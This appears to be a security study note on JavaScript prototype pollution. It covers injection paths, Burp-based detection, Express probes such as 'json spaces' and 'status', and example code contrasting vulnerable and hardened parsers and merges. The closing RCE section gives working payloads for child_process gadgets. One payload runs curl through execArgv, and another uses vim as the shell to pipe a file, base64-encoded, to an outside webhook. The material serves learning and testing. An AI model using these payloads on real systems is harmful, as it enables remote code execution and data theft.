Prototype Pollution
Prototype pollution is a JavaScript vulnerability that lets an attacker add arbitrary properties to global object prototypes (usually Object.prototype). Every object that does not define such a property itself then inherits it, including objects the application never meant to be attacker-controlled.
Three paths that reach Object.prototype from any object name:
name.__proto__
name['__proto__']
name.constructor.prototype
Steps:
Try different ways of adding an arbitrary property to Object.prototype: inject it via the query string, the URL fragment, and any JSON input (e.g. ?__proto__[foo]=bar, then evaluate Object.prototype.foo in the browser console; a value of bar means the injection worked).
Identify a gadget property that allows you to execute arbitrary JavaScript: a property the application reads without defining it, so the polluted value ends up in a sink such as innerHTML or a script src.
Use DOM Invader (in Burp's browser) for client-side gadgets and the Server-Side Prototype Pollution Scanner Burp extension for server-side detection.
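The query-string vector from the steps above, as an added example that is not code from the original page: a naive bracket-notation parser of the kind that turns ?__proto__[foo]=bar into Object.prototype.foo, beside a hardened parser. All function names (keyPath, unsafeParseQuery, safeParseQuery, inheritedValue, removeProbe) are mine, and the query strings are constructed samples.

```javascript
// Added example, not code from the original page. Function names are mine.

// Split "a[b][c]" into ["a", "b", "c"].
function keyPath(key) {
  const head = key.split('[')[0];
  const rest = Array.from(key.matchAll(/\[([^\]]*)\]/g), (m) => m[1]);
  return [head, ...rest];
}

// Split "k=v" on the first "=" only, so values may themselves contain "=".
function splitPair(pair) {
  const eq = pair.indexOf('=');
  return eq === -1
    ? [decodeURIComponent(pair), '']
    : [decodeURIComponent(pair.slice(0, eq)), decodeURIComponent(pair.slice(eq + 1))];
}

// Vulnerable: descends into whatever node[segment] already is. For the segment
// "__proto__" that is Object.prototype, so the final segment is written there.
function unsafeParseQuery(qs) {
  const result = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [key, value] = splitPair(pair);
    const path = keyPath(key);
    let node = result;
    for (const segment of path.slice(0, -1)) {
      if (typeof node[segment] !== 'object' || node[segment] === null) node[segment] = {};
      node = node[segment];
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

const DANGEROUS_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: drop any parameter containing a dangerous segment, only descend into
// the node's own properties, and build on null-prototype objects so there is
// no prototype chain to walk into.
function safeParseQuery(qs) {
  const result = Object.create(null);
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [key, value] = splitPair(pair);
    const path = keyPath(key);
    if (path.some((s) => DANGEROUS_SEGMENTS.has(s))) continue;
    let node = result;
    for (const segment of path.slice(0, -1)) {
      const own = Object.prototype.hasOwnProperty.call(node, segment);
      if (!own || typeof node[segment] !== 'object' || node[segment] === null) {
        node[segment] = Object.create(null);
      }
      node = node[segment];
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

// The console check from the steps: does a brand-new object inherit prop?
function inheritedValue(prop) {
  return ({})[prop];
}

// Undo a probe between local experiments. A real target stays polluted until
// its process restarts.
function removeProbe(prop) {
  delete Object.prototype[prop];
}

// Demo: unsafeParseQuery('?user=wiener&__proto__[foo]=bar'); inheritedValue('foo') is now 'bar'.
```

The hardened parser does three independent things, and each alone is a partial fix: the blocklist stops the three paths listed above, the own-property check stops the walk from stepping onto an inherited object, and the null-prototype result means an attacker who finds a fourth path still has nothing to reach.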
Server-side prototype pollution is more difficult to detect because of:
No source code access: you cannot read the merge or clone function that is vulnerable, so you probe blind.
Lack of developer tools: there is no console in which to inspect Object.prototype on the server.
The DoS problem: polluting a property the server relies on can break or crash the application for every user.
Pollution persistence: Object.prototype stays polluted until the Node process restarts, so each probe affects all later requests and cannot be undone remotely.
POST or PUT requests that submit JSON data to an application or API are prime candidates, because the body is typically parsed and then merged into a server-side object.
Injection via __proto__:
{
"user":"wiener",
"__proto__":{
"foo":"bar"
}
}
Injection via constructor.prototype, for when the key __proto__ is filtered:
{
"user":"wiener",
"constructor":{
"prototype":{
"foo":"bar"
}
}
}
If the application reflects the updated object, an inherited property shows up in the response as though it were the object's own:
{
"username":"wiener",
"foo":"bar"
}
Detection without reflection (Express applications)
"__proto__": {
"json spaces": 10
}
// Express's res.json() indents output with the "json spaces" app setting. The setting is normally unset, so the lookup falls through to the prototype and the raw response switches from compact JSON to 10-space indentation. This probe is non-destructive.
"__proto__": {
"status": 412
}
// Then trigger an error response with a JSON body: Express's default error handler uses err.status when it is between 400 and 599, so the response comes back as 412 instead of 500.
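The JSON-body injection and both detection probes above, as an added example that is not code from the original page or from Express: a recursive merge of a parsed body into a stored object, a hardened merge, and a small stand-in for the two Express lookups the probes rely on (res.json() reading the "json spaces" setting from a plain settings object, and the default error handler trusting err.status when it is a 4xx/5xx number). The functions unsafeMerge, safeMerge, renderJson, renderError, updateProfile and runProbes are mine, and the stored user record is a constructed sample.

```javascript
// Added example, not code from the original page or from Express. Names are mine.

// Vulnerable merge: descends into target[key] even when it is inherited, so a
// "__proto__" key reaches Object.prototype directly, and a "constructor" key
// reaches it through target.constructor (Object) and its prototype property.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {   // JSON.parse makes "__proto__" an own key
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === undefined || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skip the three dangerous keys and never descend into a
// target property that is not the target's own.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// App settings as a plain object (stand-in for Express's app.settings).
// "json spaces" is unset, so the lookup falls through to Object.prototype.
const settings = {};

// Stand-in for res.json(): indent with the "json spaces" setting.
function renderJson(body) {
  return JSON.stringify(body, null, settings['json spaces']);
}

// Stand-in for the default error handler: honour err.status if it is 400-599,
// otherwise answer 500. An inherited status is used exactly like an own one.
function renderError(err) {
  const s = err.status;
  const status = typeof s === 'number' && s >= 400 && s < 600 ? s : 500;
  return { status, body: renderJson({ error: err.message }) };
}

// The vulnerable endpoint: merge the JSON body into the stored user record
// and echo the record back.
function updateProfile(store, jsonBody) {
  unsafeMerge(store.user, JSON.parse(jsonBody));
  return renderJson(store.user);
}

// Send the two probes from the text and report what changed around them.
function runProbes() {
  const store = { user: { username: 'wiener' } };   // constructed sample record
  const before = { json: renderJson(store.user), status: renderError(new Error('x')).status };
  updateProfile(store, '{"__proto__":{"json spaces":10}}');
  updateProfile(store, '{"__proto__":{"status":412}}');
  const after = { json: renderJson(store.user), status: renderError(new Error('x')).status };
  delete Object.prototype['json spaces'];   // local cleanup; not possible on a remote target
  delete Object.prototype.status;
  return { before, after };
}
```

runProbes() shows the full chain the text describes: nothing in the stored record changes, yet an unrelated lookup elsewhere in the process (settings, or an Error object the application never touched) now returns the attacker's value.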
RCE
To identify whether the application spawns child node processes with options it inherits (a DNS or HTTP interaction with the webhook domain confirms it):
"__proto__": {
"shell":"node",
"NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}
// shell is read from the child_process options; NODE_OPTIONS is picked up because the child's environment is built by enumerating the env object, which on vulnerable Node versions includes inherited properties, and --inspect makes the child resolve the hostname. Keep the escaped empty quotes exactly as in the payload.
To exploit, via child_process.fork(), which reads execArgv from its options:
"__proto__":{
"execArgv": [
"--eval=require('child_process').execSync('curl webhook')"
]
}
or, via child_process.execSync()/spawnSync(), which read shell and input from their options; vim is started as the shell, reads the polluted input from stdin, and :! runs the rest of that line through a real shell:
"__proto__":{
"shell":"vim",
"input":":! <command>\n"
}
// e.g. "input":":! cat /file | base64 | curl -d @- https://webhook\n"
// Both need functionality that spawns a node child process. Which options are inherited depends on the Node version and on how the application builds the options object, so confirm on the target before relying on a gadget.